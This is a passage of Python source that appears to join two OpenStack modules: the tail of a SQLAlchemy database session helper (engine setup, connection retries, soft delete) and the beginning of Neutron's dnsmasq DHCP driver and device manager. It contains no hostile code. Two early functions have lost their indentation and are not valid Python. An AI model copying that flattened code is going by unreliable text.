        else:
            raise
def _set_mode_traditional(dbapi_con, connection_rec, connection_proxy):
"""Set engine mode to 'traditional'.
Required to prevent silent truncates at insert or update operations
under MySQL. By default MySQL truncates inserted string if it longer
than a declared field just with warning. That is fraught with data
corruption.
"""
dbapi_con.cursor().execute("SET SESSION sql_mode = TRADITIONAL;")
def _is_db_connection_error(args):
"""Return True if error in connecting to db."""
# NOTE(adam_g): This is currently MySQL specific and needs to be extended
# to support Postgres and others.
# For the db2, the error code is -30081 since the db2 is still not ready
conn_err_codes = ('2002', '2003', '2006', '-30081')
for err_code in conn_err_codes:
if args.find(err_code) != -1:
return True
return False
def create_engine(sql_connection, sqlite_fk=False,
                  mysql_traditional_mode=False):
    """Return a new SQLAlchemy engine.

    Builds the engine with pool settings from CONF, wires up backend
    specific event listeners, then verifies connectivity (retrying
    per CONF.database.max_retries/retry_interval).
    """
    # NOTE(geekinutah): At this point we could be connecting to the normal
    #                   db handle or the slave db handle. Things like
    #                   _wrap_db_error aren't going to work well if their
    #                   backends don't match. Let's check.
    _assert_matching_drivers()
    connection_dict = sqlalchemy.engine.url.make_url(sql_connection)

    engine_args = {
        "pool_recycle": CONF.database.idle_timeout,
        "echo": False,
        'convert_unicode': True,
    }

    # Map our SQL debug level to SQLAlchemy's options
    if CONF.database.connection_debug >= 100:
        engine_args['echo'] = 'debug'
    elif CONF.database.connection_debug >= 50:
        engine_args['echo'] = True

    if "sqlite" in connection_dict.drivername:
        if sqlite_fk:
            engine_args["listeners"] = [SqliteForeignKeysListener()]
        engine_args["poolclass"] = NullPool

        # In-memory sqlite must share one connection across threads,
        # hence StaticPool with check_same_thread disabled.
        if CONF.database.connection == "sqlite://":
            engine_args["poolclass"] = StaticPool
            engine_args["connect_args"] = {'check_same_thread': False}
    else:
        # QueuePool tuning only applies to real (non-sqlite) backends.
        if CONF.database.max_pool_size is not None:
            engine_args['pool_size'] = CONF.database.max_pool_size
        if CONF.database.max_overflow is not None:
            engine_args['max_overflow'] = CONF.database.max_overflow
        if CONF.database.pool_timeout is not None:
            engine_args['pool_timeout'] = CONF.database.pool_timeout

    engine = sqlalchemy.create_engine(sql_connection, **engine_args)

    sqlalchemy.event.listen(engine, 'checkin', _thread_yield)

    if engine.name in ['mysql', 'ibm_db_sa']:
        # Ping on checkout so dead connections are replaced transparently.
        callback = functools.partial(_ping_listener, engine)
        sqlalchemy.event.listen(engine, 'checkout', callback)
        if mysql_traditional_mode:
            sqlalchemy.event.listen(engine, 'checkout',
                                    _set_mode_traditional)
        else:
            LOG.warning(_("This application has not enabled MySQL traditional"
                          " mode, which means silent data corruption may"
                          " occur. Please encourage the application"
                          " developers to enable this mode."))
    elif 'sqlite' in connection_dict.drivername:
        if not CONF.sqlite_synchronous:
            sqlalchemy.event.listen(engine, 'connect',
                                    _synchronous_switch_listener)
        sqlalchemy.event.listen(engine, 'connect', _add_regexp_listener)

    if (CONF.database.connection_trace and
            engine.dialect.dbapi.__name__ == 'MySQLdb'):
        _patch_mysqldb_with_stacktrace_comments()

    # Establish a real connection now so startup either succeeds or
    # enters the retry loop below instead of failing later at first use.
    try:
        engine.connect()
    except sqla_exc.OperationalError as e:
        if not _is_db_connection_error(e.args[0]):
            raise

        remaining = CONF.database.max_retries
        if remaining == -1:
            remaining = 'infinite'
        while True:
            msg = _('SQL connection failed. %s attempts left.')
            LOG.warning(msg % remaining)
            if remaining != 'infinite':
                remaining -= 1
            time.sleep(CONF.database.retry_interval)
            try:
                engine.connect()
                break
            except sqla_exc.OperationalError as e:
                if (remaining != 'infinite' and remaining == 0) or \
                        not _is_db_connection_error(e.args[0]):
                    raise
    return engine
class Query(sqlalchemy.orm.query.Query):
    """Subclass of sqlalchemy.query with soft_delete() method."""

    def soft_delete(self, synchronize_session='evaluate'):
        # Marks every matched row deleted in a single UPDATE: `deleted` is
        # set to the row's own id (not a boolean) and `deleted_at` stamped.
        # NOTE(review): the id-valued `deleted` column presumably exists so
        # unique constraints including `deleted` still permit re-creating a
        # soft-deleted row — confirm against the model definitions.
        return self.update({'deleted': literal_column('id'),
                            'updated_at': literal_column('updated_at'),
                            'deleted_at': timeutils.utcnow()},
                           synchronize_session=synchronize_session)
class Session(sqlalchemy.orm.session.Session):
    """Custom Session class to avoid SqlAlchemy Session monkey patching."""

    # Each override simply delegates to the parent implementation; the
    # _wrap_db_error decorator translates backend exceptions into the
    # module's DB* exception types.
    @_wrap_db_error
    def query(self, *args, **kwargs):
        return super(Session, self).query(*args, **kwargs)

    @_wrap_db_error
    def flush(self, *args, **kwargs):
        return super(Session, self).flush(*args, **kwargs)

    @_wrap_db_error
    def execute(self, *args, **kwargs):
        return super(Session, self).execute(*args, **kwargs)
def get_maker(engine, autocommit=True, expire_on_commit=False):
    """Return a SQLAlchemy sessionmaker using the given engine.

    The factory is configured with this module's Session and Query
    subclasses so all sessions get the error-wrapping behavior.
    """
    return sqlalchemy.orm.sessionmaker(
        bind=engine,
        class_=Session,
        autocommit=autocommit,
        expire_on_commit=expire_on_commit,
        query_cls=Query)
def _patch_mysqldb_with_stacktrace_comments():
    """Adds current stack trace as a comment in queries.

    Patches MySQLdb.cursors.BaseCursor._do_query.  The filtered stack is
    appended to each SQL statement as a /* ... */ comment so it shows up
    in the MySQL slow-query/process logs.
    """
    import MySQLdb.cursors
    import traceback

    old_mysql_do_query = MySQLdb.cursors.BaseCursor._do_query

    def _do_query(self, q):
        stack = ''
        for filename, line, method, function in traceback.extract_stack():
            # exclude various common things from trace
            if filename.endswith('session.py') and method == '_do_query':
                continue
            if filename.endswith('api.py') and method == 'wrapper':
                continue
            if filename.endswith('utils.py') and method == '_inner':
                continue
            if filename.endswith('exception.py') and method == '_wrap':
                continue
            # db/api is just a wrapper around db/sqlalchemy/api
            if filename.endswith('db/api.py'):
                continue
            # only trace inside keystone
            index = filename.rfind('keystone')
            if index == -1:
                continue
            stack += "File:%s:%s Method:%s() Line:%s | " \
                     % (filename[index:], line, method, function)

        # strip trailing " | " from stack
        if stack:
            stack = stack[:-3]
            qq = "%s /* %s */" % (q, stack)
        else:
            qq = q
        old_mysql_do_query(self, qq)

    # Replace the cursor method module-wide; the original is kept via the
    # closure above so the real query still executes.
    setattr(MySQLdb.cursors.BaseCursor, '_do_query', _do_query)
def _assert_matching_drivers():
    """Make sure slave handle and normal handle have the same driver."""
    # NOTE(geekinutah): There's no use case for writing to one backend and
    #                   reading from another. Who knows what the future
    #                   holds?
    slave_uri = CONF.database.slave_connection
    if slave_uri == '':
        return

    normal_url = sqlalchemy.engine.url.make_url(CONF.database.connection)
    slave_url = sqlalchemy.engine.url.make_url(slave_uri)
    assert normal_url.drivername == slave_url.drivername
# ---- end of db/sqlalchemy session module ---------------------------------
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import collections
import os
import re
import shutil
import socket
import sys
import uuid
import netaddr
from oslo.config import cfg
import six
from neutron.agent.linux import ip_lib
from neutron.agent.linux import utils
from neutron.common import constants
from neutron.common import exceptions
from neutron.openstack.common import importutils
from neutron.openstack.common import jsonutils
from neutron.openstack.common import log as logging
from neutron.openstack.common import uuidutils
LOG = logging.getLogger(__name__)

# Configuration options for the DHCP agent's dnsmasq driver.
OPTS = [
    cfg.StrOpt('dhcp_confs',
               default='$state_path/dhcp',
               help=_('Location to store DHCP server config files')),
    cfg.StrOpt('dhcp_domain',
               default='openstacklocal',
               help=_('Domain to use for building the hostnames')),
    cfg.StrOpt('dnsmasq_config_file',
               default='',
               help=_('Override the default dnsmasq settings with this file')),
    cfg.ListOpt('dnsmasq_dns_servers',
                help=_('Comma-separated list of the DNS servers which will be '
                       'used as forwarders.'),
                deprecated_name='dnsmasq_dns_server'),
    cfg.BoolOpt('dhcp_delete_namespaces', default=False,
                help=_("Delete namespace after removing a dhcp server.")),
    cfg.IntOpt(
        'dnsmasq_lease_max',
        default=(2 ** 24),
        help=_('Limit number of leases to prevent a denial-of-service.')),
]

# Protocol/port constants used when describing which ports the DHCP/DNS
# service needs open (see DhcpBase.PORTS / Dnsmasq.PORTS).
IPV4 = 4
IPV6 = 6
UDP = 'udp'
TCP = 'tcp'
DNS_PORT = 53
DHCPV4_PORT = 67
DHCPV6_PORT = 547
METADATA_DEFAULT_PREFIX = 16
METADATA_DEFAULT_IP = '169.254.169.254'
METADATA_DEFAULT_CIDR = '%s/%d' % (METADATA_DEFAULT_IP,
                                   METADATA_DEFAULT_PREFIX)
METADATA_PORT = 80
# DHCP option code 249: Microsoft's pre-standard classless static route
# option, sent alongside option 121 for Windows 2003-era clients.
WIN2k3_STATIC_DNS = 249
# Prefix used to name the per-network DHCP namespaces.
NS_PREFIX = 'qdhcp-'
class DictModel(object):
    """Convert dict into an object that provides attribute access to values."""

    def __init__(self, d):
        """Recursively wrap *d*.

        :param d: mapping of attribute name -> value; dict values (and
            dicts inside list values) are wrapped as DictModel too, so
            nested data is reachable via chained attribute access.
        """
        # BUG FIX: d.iteritems() is Python-2-only; d.items() behaves
        # identically there and also works on Python 3.
        for key, value in d.items():
            if isinstance(value, list):
                value = [DictModel(item) if isinstance(item, dict) else item
                         for item in value]
            elif isinstance(value, dict):
                value = DictModel(value)
            setattr(self, key, value)
class NetModel(DictModel):
    """DictModel for a network, with an optional DHCP namespace name."""

    def __init__(self, use_namespaces, d):
        super(NetModel, self).__init__(d)

        # The qdhcp-<network id> namespace name only exists when namespace
        # isolation is enabled; a conditional expression is equivalent to
        # the old `and ... or ...` idiom since the name is always truthy.
        self._ns_name = ("%s%s" % (NS_PREFIX, self.id)
                         if use_namespaces else None)

    @property
    def namespace(self):
        return self._ns_name
@six.add_metaclass(abc.ABCMeta)
class DhcpBase(object):
    """Abstract driver interface for a per-network DHCP service."""

    def __init__(self, conf, network, root_helper='sudo',
                 version=None, plugin=None):
        self.conf = conf
        self.network = network
        self.root_helper = root_helper
        # DeviceManager handles creation/teardown of the DHCP port/device.
        self.device_manager = DeviceManager(self.conf,
                                            self.root_helper, plugin)
        self.version = version

    @abc.abstractmethod
    def enable(self):
        """Enables DHCP for this network."""

    @abc.abstractmethod
    def disable(self, retain_port=False):
        """Disable dhcp for this network."""

    def restart(self):
        """Restart the dhcp service for the network."""
        # Keep the port across the bounce so the device/IP stay stable.
        self.disable(retain_port=True)
        self.enable()
        self.device_manager.update(self.network)

    @abc.abstractproperty
    def active(self):
        """Boolean representing the running state of the DHCP server."""

    @abc.abstractmethod
    def reload_allocations(self):
        """Force the DHCP server to reload the assignment database."""

    @classmethod
    def existing_dhcp_networks(cls, conf, root_helper):
        """Return a list of existing networks ids that we have configs for."""

        raise NotImplementedError

    @classmethod
    def check_version(cls):
        """Execute version checks on DHCP server."""

        raise NotImplementedError
class DhcpLocalProcess(DhcpBase):
    """DhcpBase specialization that drives a local DHCP server process.

    Per-network state (pid, interface name) is persisted in small files
    under conf.dhcp_confs/<network id>/.
    """

    PORTS = []

    def _enable_dhcp(self):
        """check if there is a subnet within the network with dhcp enabled."""
        for subnet in self.network.subnets:
            if subnet.enable_dhcp:
                return True
        return False

    def enable(self):
        """Enables DHCP for this network by spawning a local process."""
        interface_name = self.device_manager.setup(self.network,
                                                   reuse_existing=True)
        if self.active:
            self.restart()
        elif self._enable_dhcp():
            self.interface_name = interface_name
            self.spawn_process()

    def disable(self, retain_port=False):
        """Disable DHCP for this network by killing the local process."""
        pid = self.pid

        if self.active:
            cmd = ['kill', '-9', pid]
            utils.execute(cmd, self.root_helper)
            if not retain_port:
                self.device_manager.destroy(self.network,
                                            self.interface_name)
        elif pid:
            # A pid file exists but /proc says no matching process.
            LOG.debug(_('DHCP for %(net_id)s pid %(pid)d is stale, ignoring '
                        'command'), {'net_id': self.network.id, 'pid': pid})
        else:
            LOG.debug(_('No DHCP started for %s'), self.network.id)

        self._remove_config_files()

        if not retain_port:
            if self.conf.dhcp_delete_namespaces and self.network.namespace:
                ns_ip = ip_lib.IPWrapper(self.root_helper,
                                         self.network.namespace)
                try:
                    ns_ip.netns.delete(self.network.namespace)
                except RuntimeError:
                    # Best-effort: namespace deletion failures are logged
                    # but do not abort the disable.
                    msg = _('Failed trying to delete namespace: %s')
                    LOG.exception(msg, self.network.namespace)

    def _remove_config_files(self):
        # Drop the whole per-network config directory.
        confs_dir = os.path.abspath(os.path.normpath(self.conf.dhcp_confs))
        conf_dir = os.path.join(confs_dir, self.network.id)
        shutil.rmtree(conf_dir, ignore_errors=True)

    def get_conf_file_name(self, kind, ensure_conf_dir=False):
        """Returns the file name for a given kind of config file."""
        confs_dir = os.path.abspath(os.path.normpath(self.conf.dhcp_confs))
        conf_dir = os.path.join(confs_dir, self.network.id)
        if ensure_conf_dir:
            if not os.path.isdir(conf_dir):
                os.makedirs(conf_dir, 0o755)

        return os.path.join(conf_dir, kind)

    def _get_value_from_conf_file(self, kind, converter=None):
        """A helper function to read a value from one of the state files."""
        file_name = self.get_conf_file_name(kind)
        msg = _('Error while reading %s')
        try:
            with open(file_name, 'r') as f:
                try:
                    return converter and converter(f.read()) or f.read()
                except ValueError:
                    msg = _('Unable to convert value in %s')
        except IOError:
            msg = _('Unable to access %s')

        # Fall through on any failure: log and report "no value".
        LOG.debug(msg % file_name)
        return None

    @property
    def pid(self):
        """Last known pid for the DHCP process spawned for this network."""
        return self._get_value_from_conf_file('pid', int)

    @property
    def active(self):
        # A stored pid is only trusted if /proc shows a live process whose
        # command line mentions this network's id.
        pid = self.pid
        if pid is None:
            return False

        cmdline = '/proc/%s/cmdline' % pid
        try:
            with open(cmdline, "r") as f:
                return self.network.id in f.readline()
        except IOError:
            return False

    @property
    def interface_name(self):
        # Name of the device the DHCP server listens on, persisted in the
        # 'interface' state file.
        return self._get_value_from_conf_file('interface')

    @interface_name.setter
    def interface_name(self, value):
        interface_file_path = self.get_conf_file_name('interface',
                                                      ensure_conf_dir=True)
        utils.replace_file(interface_file_path, value)

    @abc.abstractmethod
    def spawn_process(self):
        pass
class Dnsmasq(DhcpLocalProcess):
    """DhcpLocalProcess driver that runs dnsmasq for a network."""

    # The ports that need to be opened when security policies are active
    # on the Neutron port used for DHCP.  These are provided as a
    # convenience for users of this class.
    PORTS = {IPV4: [(UDP, DNS_PORT), (TCP, DNS_PORT), (UDP, DHCPV4_PORT)],
             IPV6: [(UDP, DNS_PORT), (TCP, DNS_PORT), (UDP, DHCPV6_PORT)],
             }

    # Per-subnet tag names used in the dnsmasq hosts/opts files ("tag0", ...).
    _TAG_PREFIX = 'tag%d'

    NEUTRON_NETWORK_ID_KEY = 'NEUTRON_NETWORK_ID'
    NEUTRON_RELAY_SOCKET_PATH_KEY = 'NEUTRON_RELAY_SOCKET_PATH'
    # First dnsmasq release supporting the set:/tag: tag syntax.
    MINIMUM_VERSION = 2.59

    @classmethod
    def check_version(cls):
        """Return the installed dnsmasq version, warning if it is too old."""
        ver = 0
        try:
            cmd = ['dnsmasq', '--version']
            out = utils.execute(cmd)
            # NOTE(review): the '.' in this pattern is an unescaped regex
            # wildcard — it matches the literal dot in "X.Y" but would also
            # match any other character; consider r"\d+\.\d+".
            ver = re.findall("\d+.\d+", out)[0]
            is_valid_version = float(ver) >= cls.MINIMUM_VERSION
            if not is_valid_version:
                LOG.warning(_('FAILED VERSION REQUIREMENT FOR DNSMASQ. '
                              'DHCP AGENT MAY NOT RUN CORRECTLY! '
                              'Please ensure that its version is %s '
                              'or above!'), cls.MINIMUM_VERSION)
        except (OSError, RuntimeError, IndexError, ValueError):
            LOG.warning(_('Unable to determine dnsmasq version. '
                          'Please ensure that its version is %s '
                          'or above!'), cls.MINIMUM_VERSION)
        return float(ver)

    @classmethod
    def existing_dhcp_networks(cls, conf, root_helper):
        """Return a list of existing networks ids that we have configs for."""
        confs_dir = os.path.abspath(os.path.normpath(conf.dhcp_confs))
        # Config directories are named after the network UUID.
        return [
            c for c in os.listdir(confs_dir)
            if uuidutils.is_uuid_like(c)
        ]

    def spawn_process(self):
        """Spawns a Dnsmasq process for the network."""
        env = {
            self.NEUTRON_NETWORK_ID_KEY: self.network.id,
        }

        cmd = [
            'dnsmasq',
            '--no-hosts',
            '--no-resolv',
            '--strict-order',
            '--bind-interfaces',
            '--interface=%s' % self.interface_name,
            '--except-interface=lo',
            '--pid-file=%s' % self.get_conf_file_name(
                'pid', ensure_conf_dir=True),
            '--dhcp-hostsfile=%s' % self._output_hosts_file(),
            '--dhcp-optsfile=%s' % self._output_opts_file(),
            '--leasefile-ro',
        ]

        possible_leases = 0
        for i, subnet in enumerate(self.network.subnets):
            # if a subnet is specified to have dhcp disabled
            if not subnet.enable_dhcp:
                continue
            if subnet.ip_version == 4:
                mode = 'static'
            else:
                # TODO(mark): how do we indicate other options
                # ra-only, slaac, ra-nameservers, and ra-stateless.
                mode = 'static'
            # Tag syntax ('set:') only exists from MINIMUM_VERSION on.
            if self.version >= self.MINIMUM_VERSION:
                set_tag = 'set:'
            else:
                set_tag = ''

            cidr = netaddr.IPNetwork(subnet.cidr)

            cmd.append('--dhcp-range=%s%s,%s,%s,%ss' %
                       (set_tag, self._TAG_PREFIX % i,
                        cidr.network,
                        mode,
                        self.conf.dhcp_lease_duration))

            possible_leases += cidr.size

        # Cap the limit because creating lots of subnets can inflate
        # this possible lease cap.
        cmd.append('--dhcp-lease-max=%d' %
                   min(possible_leases, self.conf.dnsmasq_lease_max))

        cmd.append('--conf-file=%s' % self.conf.dnsmasq_config_file)
        if self.conf.dnsmasq_dns_servers:
            cmd.extend(
                '--server=%s' % server
                for server in self.conf.dnsmasq_dns_servers)
        if self.conf.dhcp_domain:
            cmd.append('--domain=%s' % self.conf.dhcp_domain)

        # Run dnsmasq inside the network's namespace with the network id
        # exported so lease_update() can identify the network.
        ip_wrapper = ip_lib.IPWrapper(self.root_helper,
                                      self.network.namespace)
        ip_wrapper.netns.execute(cmd, addl_env=env)

    def _release_lease(self, mac_address, ip):
        """Release a DHCP lease."""
        cmd = ['dhcp_release', self.interface_name, ip, mac_address]
        ip_wrapper = ip_lib.IPWrapper(self.root_helper,
                                      self.network.namespace)
        ip_wrapper.netns.execute(cmd)

    def reload_allocations(self):
        """Rebuild the dnsmasq config and signal the dnsmasq to reload."""

        # If all subnets turn off dhcp, kill the process.
        if not self._enable_dhcp():
            self.disable()
            LOG.debug(_('Killing dhcpmasq for network since all subnets have '
                        'turned off DHCP: %s'), self.network.id)
            return

        self._release_unused_leases()
        self._output_hosts_file()
        self._output_opts_file()
        if self.active:
            # SIGHUP makes dnsmasq re-read its hosts/opts files.
            cmd = ['kill', '-HUP', self.pid]
            utils.execute(cmd, self.root_helper)
        else:
            LOG.debug(_('Pid %d is stale, relaunching dnsmasq'), self.pid)
        LOG.debug(_('Reloading allocations for network: %s'), self.network.id)
        self.device_manager.update(self.network)

    def _output_hosts_file(self):
        """Writes a dnsmasq compatible hosts file."""
        r = re.compile('[:.]')
        buf = six.StringIO()
        filename = self.get_conf_file_name('host')

        LOG.debug(_('Building host file: %s'), filename)
        for port in self.network.ports:
            for alloc in port.fixed_ips:
                # Hostname is derived from the IP with ':'/'.' replaced.
                name = 'host-%s.%s' % (r.sub('-', alloc.ip_address),
                                       self.conf.dhcp_domain)
                set_tag = ''
                # (dzyu) Check if it is legal ipv6 address, if so, need wrap
                # it with '[]' to let dnsmasq to distinguish MAC address from
                # IPv6 address.
                ip_address = alloc.ip_address
                if netaddr.valid_ipv6(ip_address):
                    ip_address = '[%s]' % ip_address

                LOG.debug(_('Adding %(mac)s : %(name)s : %(ip)s'),
                          {"mac": port.mac_address, "name": name,
                           "ip": ip_address})

                if getattr(port, 'extra_dhcp_opts', False):
                    # Ports with extra options get tagged with their port id
                    # so _output_opts_file() can target them.
                    if self.version >= self.MINIMUM_VERSION:
                        set_tag = 'set:'

                    buf.write('%s,%s,%s,%s%s\n' %
                              (port.mac_address, name, ip_address,
                               set_tag, port.id))
                else:
                    buf.write('%s,%s,%s\n' %
                              (port.mac_address, name, ip_address))

        utils.replace_file(filename, buf.getvalue())
        LOG.debug(_('Done building host file %s'), filename)
        return filename

    def _read_hosts_file_leases(self, filename):
        # Parse the hosts file back into a set of (ip, mac) tuples.
        leases = set()
        if os.path.exists(filename):
            with open(filename) as f:
                for l in f.readlines():
                    host = l.strip().split(',')
                    leases.add((host[2], host[0]))
        return leases

    def _release_unused_leases(self):
        filename = self.get_conf_file_name('host')
        old_leases = self._read_hosts_file_leases(filename)

        new_leases = set()
        for port in self.network.ports:
            for alloc in port.fixed_ips:
                new_leases.add((alloc.ip_address, port.mac_address))

        # Anything previously leased but no longer allocated is released.
        for ip, mac in old_leases - new_leases:
            self._release_lease(mac, ip)

    def _output_opts_file(self):
        """Write a dnsmasq compatible options file."""

        if self.conf.enable_isolated_metadata:
            subnet_to_interface_ip = self._make_subnet_interface_ip_map()

        options = []

        # Collects, per subnet index, the DHCP-port IPs to advertise as
        # DNS servers when no explicit dns_nameservers were provided.
        dhcp_ips = collections.defaultdict(list)
        subnet_idx_map = {}
        for i, subnet in enumerate(self.network.subnets):
            if not subnet.enable_dhcp:
                continue
            if subnet.dns_nameservers:
                options.append(
                    self._format_option(i, 'dns-server',
                                        ','.join(subnet.dns_nameservers)))
            else:
                # use the dnsmasq ip as nameservers only if there is no
                # dns-server submitted by the server
                subnet_idx_map[subnet.id] = i

            gateway = subnet.gateway_ip
            host_routes = []
            for hr in subnet.host_routes:
                if hr.destination == "0.0.0.0/0":
                    # A default-route host route overrides the gateway.
                    gateway = hr.nexthop
                else:
                    host_routes.append("%s,%s" % (hr.destination, hr.nexthop))

            # Add host routes for isolated network segments
            if self._enable_metadata(subnet):
                subnet_dhcp_ip = subnet_to_interface_ip[subnet.id]
                host_routes.append(
                    '%s/32,%s' % (METADATA_DEFAULT_IP, subnet_dhcp_ip)
                )

            if host_routes:
                # Emit both the standard option and the Windows 2003
                # pre-standard code 249 variant.
                options.append(
                    self._format_option(i, 'classless-static-route',
                                        ','.join(host_routes)))
                options.append(
                    self._format_option(i, WIN2k3_STATIC_DNS,
                                        ','.join(host_routes)))

            if subnet.ip_version == 4:
                if gateway:
                    options.append(self._format_option(i, 'router', gateway))
                else:
                    # Empty 'router' option tells clients there is no
                    # default gateway.
                    options.append(self._format_option(i, 'router'))

        for port in self.network.ports:
            if getattr(port, 'extra_dhcp_opts', False):
                options.extend(
                    self._format_option(port.id, opt.opt_name, opt.opt_value)
                    for opt in port.extra_dhcp_opts)

            # provides all dnsmasq ip as dns-server if there is more than
            # one dnsmasq for a subnet and there is no dns-server submitted
            # by the server
            if port.device_owner == constants.DEVICE_OWNER_DHCP:
                for ip in port.fixed_ips:
                    i = subnet_idx_map.get(ip.subnet_id)
                    if i is None:
                        continue
                    dhcp_ips[i].append(ip.ip_address)

        for i, ips in dhcp_ips.items():
            if len(ips) > 1:
                options.append(self._format_option(i,
                                                   'dns-server',
                                                   ','.join(ips)))

        name = self.get_conf_file_name('opts')
        utils.replace_file(name, '\n'.join(options))
        return name

    def _make_subnet_interface_ip_map(self):
        """Map subnet id -> IP of the DHCP interface inside that subnet."""
        ip_dev = ip_lib.IPDevice(
            self.interface_name,
            self.root_helper,
            self.network.namespace
        )

        subnet_lookup = dict(
            (netaddr.IPNetwork(subnet.cidr), subnet.id)
            for subnet in self.network.subnets
        )

        retval = {}

        for addr in ip_dev.addr.list():
            ip_net = netaddr.IPNetwork(addr['cidr'])

            if ip_net in subnet_lookup:
                retval[subnet_lookup[ip_net]] = addr['cidr'].split('/')[0]

        return retval

    def _format_option(self, tag, option, *args):
        """Format DHCP option by option name or code."""
        if self.version >= self.MINIMUM_VERSION:
            set_tag = 'tag:'
        else:
            set_tag = ''

        option = str(option)

        if isinstance(tag, int):
            tag = self._TAG_PREFIX % tag

        if not option.isdigit():
            option = 'option:%s' % option

        return ','.join((set_tag + tag, '%s' % option) + args)

    def _enable_metadata(self, subnet):
        '''Determine if the metadata route will be pushed to hosts on subnet.

        If subnet has a Neutron router attached, we want the hosts to get
        metadata from the router's proxy via their default route instead.
        '''
        if self.conf.enable_isolated_metadata and subnet.ip_version == 4:
            if subnet.gateway_ip is None:
                return True
            else:
                for port in self.network.ports:
                    if port.device_owner == constants.DEVICE_OWNER_ROUTER_INTF:
                        for alloc in port.fixed_ips:
                            if alloc.subnet_id == subnet.id:
                                return False
                return True
        else:
            return False

    @classmethod
    def lease_update(cls):
        """Entry point invoked by dnsmasq on lease add/del/old events.

        Reads the event from argv/environ and forwards it over the relay
        unix socket (when present) as JSON.
        """
        network_id = os.environ.get(cls.NEUTRON_NETWORK_ID_KEY)
        dhcp_relay_socket = os.environ.get(cls.NEUTRON_RELAY_SOCKET_PATH_KEY)

        action = sys.argv[1]
        if action not in ('add', 'del', 'old'):
            sys.exit()

        mac_address = sys.argv[2]
        ip_address = sys.argv[3]

        if action == 'del':
            lease_remaining = 0
        else:
            lease_remaining = int(os.environ.get('DNSMASQ_TIME_REMAINING', 0))

        data = dict(network_id=network_id, mac_address=mac_address,
                    ip_address=ip_address, lease_remaining=lease_remaining)

        if os.path.exists(dhcp_relay_socket):
            sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            sock.connect(dhcp_relay_socket)
            sock.send(jsonutils.dumps(data))
            sock.close()
class DeviceManager(object):
    """Manage the DHCP server's Neutron port and local network device.

    Creates/updates the DHCP port through the plugin RPC proxy, plugs and
    configures the matching interface via the configured interface driver,
    and maintains the default route inside the DHCP namespace.
    """
    def __init__(self, conf, root_helper, plugin):
        # conf: agent configuration; must name an interface_driver class.
        # root_helper: privilege-escalation prefix used by ip_lib devices.
        # plugin: RPC proxy used to create/update/release DHCP ports.
        self.conf = conf
        self.root_helper = root_helper
        self.plugin = plugin
        if not conf.interface_driver:
            msg = _('An interface driver must be specified')
            LOG.error(msg)
            # A missing/unloadable driver is unrecoverable for the agent
            # process, so bail out entirely.
            raise SystemExit(msg)
        try:
            self.driver = importutils.import_object(
                conf.interface_driver, conf)
        except Exception as e:
            msg = (_("Error importing interface driver '%(driver)s': "
                     "%(inner)s") % {'driver': conf.interface_driver,
                                     'inner': e})
            LOG.error(msg)
            raise SystemExit(msg)
    def get_interface_name(self, network, port):
        """Return interface(device) name for use by the DHCP process."""
        return self.driver.get_device_name(port)
    def get_device_id(self, network):
        """Return a unique DHCP device ID for this host on the network."""
        # There could be more than one dhcp server per network, so create
        # a device id that combines host and network ids
        # uuid5 over the hostname is deterministic, so the same host
        # always produces the same id for a given network.
        host_uuid = uuid.uuid5(uuid.NAMESPACE_DNS, socket.gethostname())
        return 'dhcp%s-%s' % (host_uuid, network.id)
    def _get_device(self, network, port):
        """Return DHCP ip_lib device for this host on the network."""
        interface_name = self.get_interface_name(network, port)
        return ip_lib.IPDevice(interface_name,
                               self.root_helper,
                               network.namespace)
    def _set_default_route(self, network, port):
        """Sets the default gateway for this dhcp namespace.
        This method is idempotent and will only adjust the route if adjusting
        it would change it from what it already is. This makes it safe to call
        and avoids unnecessary perturbation of the system.
        """
        device = self._get_device(network, port)
        gateway = device.route.get_gateway()
        if gateway:
            gateway = gateway['gateway']
        for subnet in network.subnets:
            # Only IPv4, DHCP-enabled subnets with a gateway are candidates
            # for providing the namespace's default route.
            skip_subnet = (
                subnet.ip_version != 4
                or not subnet.enable_dhcp
                or subnet.gateway_ip is None)
            if skip_subnet:
                continue
            # Idempotency: only touch the route when it actually differs.
            if gateway != subnet.gateway_ip:
                m = _('Setting gateway for dhcp netns on net %(n)s to %(ip)s')
                LOG.debug(m, {'n': network.id, 'ip': subnet.gateway_ip})
                device.route.add_gateway(subnet.gateway_ip)
            # First eligible subnet wins; later subnets are ignored.
            return
        # No subnets on the network have a valid gateway.  Clean it up to avoid
        # confusion from seeing an invalid gateway here.
        if gateway is not None:
            msg = _('Removing gateway for dhcp netns on net %s')
            LOG.debug(msg, network.id)
            device.route.delete_gateway(gateway)
    def setup_dhcp_port(self, network):
        """Create/update DHCP port for the host if needed and return port.

        Looks for an existing port whose device_id matches this host's DHCP
        device id; extends its fixed IPs to cover any newly DHCP-enabled
        subnets, or creates a fresh port when none exists.  The returned
        port's fixed_ips entries are enriched with their full subnet dicts.
        """
        device_id = self.get_device_id(network)
        subnets = {}
        dhcp_enabled_subnet_ids = []
        for subnet in network.subnets:
            if subnet.enable_dhcp:
                dhcp_enabled_subnet_ids.append(subnet.id)
                subnets[subnet.id] = subnet
        dhcp_port = None
        for port in network.ports:
            port_device_id = getattr(port, 'device_id', None)
            if port_device_id == device_id:
                port_fixed_ips = []
                for fixed_ip in port.fixed_ips:
                    port_fixed_ips.append({'subnet_id': fixed_ip.subnet_id,
                                           'ip_address': fixed_ip.ip_address})
                    if fixed_ip.subnet_id in dhcp_enabled_subnet_ids:
                        dhcp_enabled_subnet_ids.remove(fixed_ip.subnet_id)
                # If there are dhcp_enabled_subnet_ids here that means that
                # we need to add those to the port and call update.
                if dhcp_enabled_subnet_ids:
                    port_fixed_ips.extend(
                        [dict(subnet_id=s) for s in dhcp_enabled_subnet_ids])
                    dhcp_port = self.plugin.update_dhcp_port(
                        port.id, {'port': {'fixed_ips': port_fixed_ips}})
                    if not dhcp_port:
                        raise exceptions.Conflict()
                else:
                    dhcp_port = port
                # break since we found port that matches device_id
                break
        # DHCP port has not yet been created.
        if dhcp_port is None:
            LOG.debug(_('DHCP port %(device_id)s on network %(network_id)s'
